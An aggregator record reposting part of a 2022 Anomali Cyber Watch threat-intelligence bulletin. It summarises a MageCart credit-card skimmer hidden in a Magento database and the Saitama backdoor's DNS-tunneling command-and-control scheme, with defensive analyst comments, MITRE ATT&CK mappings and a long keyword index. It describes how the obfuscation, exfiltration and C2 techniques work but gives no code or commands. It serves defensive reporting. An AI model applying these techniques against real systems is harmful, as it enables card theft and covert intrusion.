One Article Review
| Source |  Anomali |
|---|---|
| Identifiant | 4921519 |
| Date de publication | 2022-06-01 17:47:00 (vue: 2022-06-01 18:07:16) |
| Titre | Anomali Cyber Watch: TURLA\'s New Phishing-Based Reconnaissance Campaign in Eastern Europe, Unknown APT Group Has Targeted Russia Repeatedly Since Ukraine Invasion and More |
| Texte | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Chromeloader, Goodwill, MageCart, Saitama, Turla and Yashma. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Credit Card Stealer Targets PsiGate Payment Gateway Software
(published: May 25, 2022)
Sucuri Researchers have detailed their findings on a MageCart skimmer that had been discovered within the Magento payment portal. Embedded within the core_config_data table of Magento’s database, the skimmer was obfuscated and encoded with CharCode. Once deobfuscated, a JavaScript credit card stealer was revealed. The stealer is able to acquire text and fields that are submitted to the payment page, including credit card numbers and expiry dates. Once stolen, a synchronous AJAX is used to exfiltrate the data.
Analyst Comment: Harden endpoint security and utilize firewalls to block suspicious activity to help mitigate against skimmer injection. Monitor network traffic to identify anomalous behavior that may indicate C2 activity.
MITRE ATT&CK: [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041 | [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Input Capture - T1056
Tags: MageCart, skimmer, JavaScript Magento, PsiGate, AJAX
How the Saitama Backdoor uses DNS Tunneling
(published: May 25, 2022)
MalwareBytes Researchers have released their report detailing the process behind which the Saitama backdoor utilizes DNS tunneling to stealthy communicate with command and control (C2) infrastructure. DNS tunneling is an effective way to hide C2 communication as DNS traffic serves a vital function in modern day internet communications thus blocking DNS traffic is almost never done. Saitama formats its DNS lookups with the structure of a domain consisting of message, counter . root domain. Data is encoded utilizing a hardcoded base36 alphabet. There are four types of messages that Saitama can send using this method: Make Contact to establish communication with a C2 domain, Ask For Command to get the expected size of the payload to be delivered, Get A Command in which Saitama will make Receive requests to retrieve payloads and instructions and finally Run The Command in which Saitama runs the instructions or executes the payload and sends the results to the established C2.
Analyst Comment: Implement an effective DNS filtering system to block malicious queries. Furthermore, maintaining a whitelist of allowed applications for installation will assist in preventing malware like Saitama from being installed.
MITRE ATT&CK: [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041
Tags: C2, DNS, Saitama, backdoor, base36, DNS tunneling
|
| Notes | |
| Envoyé | Oui |
| Condensat | 2019 2022 256 2mb 3010 ability able access accompanied achieves acquire activity actor actors address advanced afford after against ajax allowed allows almost along alphabet always analysis analyst analysts analyze anomali anomalous anti any api appdata application applications apt aramco are around artifacts ask asks assist assistance associated att&ck att&ck: attached attachment attacker attackers attacks attributed austrian available avoid back backdoor backup baltic base base36 based been before behavior behind being bfdoor bill binary blackberry blake2b block blocking bpfdoor brand browser but bypasses call campaign campaigns can canary cannot capture card cause cdrs chain chamber change channel chaos charcode charts check cheers cheerscrypt children china chrome chromeloader chromeloader: cipher claiming clothes/blankets code collect college com command comment comment: communicate communication communications companies company config configured considering consisting contact containing control controlled core counter country country:in country:ru covering cracked create creator credit cross crowdstrike current currently custom cve cyber cyberespionage cybersecurity d810 data database dates dating day dealing decisivearchitect decryption decryptors deep defence defenders defense defenses delivered demanding demands deobfuscate deobfuscate/decode deobfuscated depth despite destroying destruction detail detailed detailing detect detects developed developer devices directory disaster discovered discovery discuss discussed distributed dll dns document documenting documents domain domains dominos donate done double downloaded downtime drops early eastern ecdh economic editing effective either email emails embedded employs enable encoded encoding encrypt encrypted encrypting encryptions endpoint enforce ensure enticed entities error essentially establish established esxi europe evasion even evolution evolving exe executable executes execution exfiltrate exfiltration expanded expected expiry exploitation extension extensions external extortion eye fail family february federal fiddler fields figure file files filter filtering final finally financial findings firewalls first five flattening flow following forces form formats four from fsb function functionality furthermore game gateway generate get glimpse global goodwill google government group hacktivism had hardcoded harden has have heavily help hide hijacker hindi homeless hospital host how http https hunting hut ida identified identify identifying impacket impact impair implant implement implementing important included includes including increase india indicate indicating indicators infection information infrastructure ingress initial inject injection input inside installation installed instead instructions intelligence intentions interact interactive internet interpreter invasion ioc iocs iso it’s iteration iterations its itself javascript job joint justforfun keep keeping key kfc known languages last late later laterally latest launch layer ldapdomaindump learning least less libpcap library like limitation line linux load loaded loader loading local logistic logistics logon logs look lookups loss lures: machine macos made magazine magecart magento magento’s main maintain maintaining make makes making malicious malvertiser malware malwarebytes map march maximize may measures menshen message messages method: military minimize mitigate mitre modern modify monetary monitor monitored monitoring more movie moving named nato need net network never new news non noticed novel now number numbers obfuscated obfuscation observe ollvm once only onyx open operations oracle organizations over overcoming owner/user packet page panda parameter paths patients pay paying payload payloads payment people persistence persistent phishing phone pirated pizza planning plugin png policy poor portal possible possibly post posture potential powershell pretense prevent preventing private process processes protection protocol provide provided provides proxy psigate published: |
| Tags | Ransomware Malware Tool Threat |
| Stories | APT 19 |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.